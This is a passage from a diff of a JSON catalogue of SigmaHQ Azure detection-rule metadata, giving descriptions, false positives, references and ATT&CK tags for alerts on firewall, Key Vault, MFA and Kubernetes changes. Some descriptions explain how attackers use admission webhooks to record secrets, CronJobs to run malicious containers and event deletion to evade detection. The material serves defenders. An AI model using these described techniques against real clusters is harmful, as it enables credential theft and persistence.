- ], - "filename": "azure_device_or_configuration_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "46530378-f9db-4af9-a9e5-889c177d3881", - "value": "Azure Device or Configuration Modified or Deleted" - }, - { - "description": "Identifies when DNS zone is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_dns_zone_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "af6925b0-8826-47f1-9324-337507a0babd", - "value": "Azure DNS Zone Modified or Deleted" - }, - { - "description": "Identifies when an user or application modified the federation settings on the domain.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/09/06", - "falsepositive": [ - "Federation Settings being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_federation_modified.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://attack.mitre.org/techniques/T1078", - "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_federation_modified.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "352a54e1-74ba-4929-9d47-8193d67aba1e", - "value": "Azure Domain Federation Settings Modified" - }, - { - "description": "Identifies when a firewall is created, modified, or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "Firewall being modified or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_firewall_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "512cf937-ea9b-4332-939c-4c2c94baadcd", - "value": "Azure Firewall Modified or Deleted" - }, - { - "description": "Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_firewall_rule_collection_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "025c9fe7-db72-49f9-af0d-31341dd7dd57", - "value": "Azure Firewall Rule Collection Modified or Deleted" - }, - { - "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", - "meta": { - "author": "sawwinnnaung", - "creation_date": "2020/05/07", - "falsepositive": [ - "Valid change" - ], - "filename": "azure_granting_permission_detection.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_granting_permission_detection.yml" - ], - "tags": [ - "attack.t1098" - ] - }, - "uuid": "a622fcd2-4b5a-436a-b8a2-a4171161833c", - "value": "Granting Of Permissions To An Account" - }, - { - "description": "Monitor and alert on group membership additions of groups that have CA policy modification access", - "meta": { - "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", - "creation_date": "2022/08/04", - "falsepositive": [ - "User removed from the group is approved" - ], - "filename": "azure_group_user_addition_ca_modification.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_addition_ca_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "91c95675-1f27-46d0-bead-d1ae96b97cd3", - "value": "User Added To Group With CA Policy Modification Access" - }, - { - "description": "Monitor and alert on group membership removal of groups that have CA policy modification access", - "meta": { - "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", - "creation_date": "2022/08/04", - "falsepositive": [ - "User removed from the group is approved" - ], - "filename": "azure_group_user_removal_ca_modification.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_removal_ca_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", - "value": "User Removed From Group With CA Policy Modification Access" - }, - { - "description": "Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/08/10", - "falsepositive": [ - "A non malicious user is unaware of the proper process" - ], - "filename": "azure_guest_invite_failure.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_invite_failure.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", - "value": "Guest User Invited By Non Approved Inviters" - }, - { - "description": "Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.", - "meta": { - "author": "MikeDuddington, '@dudders1'", - "creation_date": "2022/06/30", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "filename": "azure_guest_to_member.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_to_member.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", - "value": "User State Changed From Guest To Member" - }, - { - "description": "Identifies when a Keyvault Key is modified or deleted in Azure.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/16", - "falsepositive": [ - "Key being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_keyvault_key_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access", - "attack.t1552", - "attack.t1552.001" - ] - }, - "uuid": "80eeab92-0979-4152-942d-96749e11df40", - "value": "Azure Keyvault Key Modified or Deleted" - }, - { - "description": "Identifies when a key vault is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/16", - "falsepositive": [ - "Key Vault being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_keyvault_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access", - "attack.t1552", - "attack.t1552.001" - ] - }, - "uuid": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", - "value": "Azure Key Vault Modified or Deleted" - }, - { - "description": "Identifies when secrets are modified or deleted in Azure.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/16", - "falsepositive": [ - "Secrets being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_keyvault_secrets_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access", - "attack.t1552", - "attack.t1552.001" - ] - }, - "uuid": "b831353c-1971-477b-abb6-2828edc3bca1", - "value": "Azure Keyvault Secrets Modified or Deleted" - }, - { - "description": "Identifies when an admission controller is executed in Azure Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\nAn adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/25", - "falsepositive": [ - "Azure Kubernetes Admissions Controller may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_kubernetes_admission_controller.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_admission_controller.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1078", - "attack.credential_access", - "attack.t1552", - "attack.t1552.007" - ] - }, - "uuid": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", - "value": "Azure Kubernetes Admission Controller" - }, - { - "description": "Detects when a Azure Kubernetes Cluster is created or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/07", - "falsepositive": [ - "Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_kubernetes_cluster_created_or_deleted.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "9541f321-7cba-4b43-80fc-fbd1fb922808", - "value": "Azure Kubernetes Cluster Created or Deleted" - }, - { - "description": "Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/22", - "falsepositive": [ - "Azure Kubernetes CronJob/Job may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_kubernetes_cronjob.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", - "https://kubernetes.io/docs/concepts/workloads/controllers/job/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.execution" - ] - }, - "uuid": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", - "value": "Azure Kubernetes CronJob" - }, - { - "description": "Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/07/24", - "falsepositive": [ - "Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_kubernetes_events_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.t1562.001" - ] - }, - "uuid": "225d8b09-e714-479c-a0e4-55e6f29adf35", - "value": "Azure Kubernetes Events Deleted" - }, - { - "description": "Identifies when a Azure Kubernetes network policy is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/07", - "falsepositive": [ - "Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_kubernetes_network_policy_change.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access" - ] - }, - "uuid": "08d6ac24-c927-4469-b3b7-2e422d6e3c43", - "value": "Azure Kubernetes Network Policy Change" - }, - { - "description": "Identifies the deletion of Azure Kubernetes Pods.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/07/24", - "falsepositive": [ - "Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_kubernetes_pods_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "b02f9591-12c3-4965-986a-88028629b2e1", - "value": "Azure Kubernetes Pods Deleted" - }, - { - "description": "Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/07", - "falsepositive": [ - "RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_kubernetes_rolebinding_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.credential_access" - ] - }, - "uuid": "25cb259b-bbdc-4b87-98b7-90d7c72f8743", - "value": "Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted" - }, - { - "description": "Identifies when ClusterRoles/Roles are being modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/07", - "falsepositive": [ - "ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_kubernetes_role_access.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "818fee0c-e0ec-4e45-824e-83e4817b0887", - "value": "Azure Kubernetes Sensitive Role Access" - }, - { - "description": "Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/07", - "falsepositive": [ - "Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_kubernetes_secret_or_config_object_access.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "7ee0b4aa-d8d4-4088-b661-20efdf41a04c", - "value": "Azure Kubernetes Secret or Config Object Access" - }, - { - "description": "Identifies when a service account is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/07", - "falsepositive": [ - "Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_kubernetes_service_account_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2", - "value": "Azure Kubernetes Service Account Modified or Deleted" - }, - { - "description": "Alert on when legecy authentication has been used on an account", - "meta": { - "author": "Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/06/17", - "falsepositive": [ - "User has been put in acception group so they can use legacy authentication" - ], - "filename": "azure_legacy_authentication_protocols.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_legacy_authentication_protocols.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ] - }, - "uuid": "60f6535a-760f-42a9-be3f-c9a0a025906e", - "value": "Use of Legacy Authentication Protocols" - }, - { - "description": "Detect failed attempts to sign in to disabled accounts.", - "meta": { - "author": "AlertIQ", - "creation_date": "2021/10/10", - "falsepositive": [ - 
"Unknown" - ], - "filename": "azure_login_to_disabled_account.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_login_to_disabled_account.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", - "value": "Login to Disabled Account" - }, - { - "description": "User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.", - "meta": { - "author": "AlertIQ", - "creation_date": "2022/03/24", - "falsepositive": [ - "Users actually login but miss-click into the Deny button when MFA prompt." - ], - "filename": "azure_mfa_denies.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_denies.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078.004" - ] - }, - "uuid": "e40f4962-b02b-4192-9bfe-245f7ece1f99", - "value": "Multifactor Authentication Denied" - }, - { - "description": "Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.", - "meta": { - "author": "@ionsor", - "creation_date": "2022/02/08", - "falsepositive": [ - "Authorized modification by administrators" - ], - "filename": "azure_mfa_disabled.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://attack.mitre.org/techniques/T1556/", - 
"https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_disabled.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1556" - ] - }, - "uuid": "7ea78478-a4f9-42a6-9dcd-f861816122bf", - "value": "Disabled MFA to Bypass Authentication Mechanisms" - }, - { - "description": "Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.", - "meta": { - "author": "AlertIQ", - "creation_date": "2021/10/10", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_mfa_interrupted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_interrupted.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078.004" - ] - }, - "uuid": "5496ff55-42ec-4369-81cb-00f417029e25", - "value": "Multifactor Authentication Interrupted" - }, - { - "description": "Identifies when a Firewall Policy is Modified or Deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/02", - "falsepositive": [ - "Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_network_firewall_policy_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "83c17918-746e-4bd9-920b-8e098bf88c23", - "value": "Azure Network Firewall Policy Modified or Deleted" - }, - { - "description": "Identifies when a Firewall Rule Configuration is Modified or Deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_network_firewall_rule_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "2a7d64cf-81fa-4daf-ab1b-ab80b789c067", - "value": "Azure Firewall Rule Configuration Modified or Deleted" - }, - { - "description": "Identifies when a Point-to-site VPN is Modified or Deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_network_p2s_vpn_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "d9557b75-267b-4b43-922f-a775e2d1f792", - "value": "Azure Point-to-site VPN Modified or Deleted" - }, - { - "description": "Identifies when a network security configuration is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "Network Security Configuration being modified or deleted may be performed by a system administrator. 
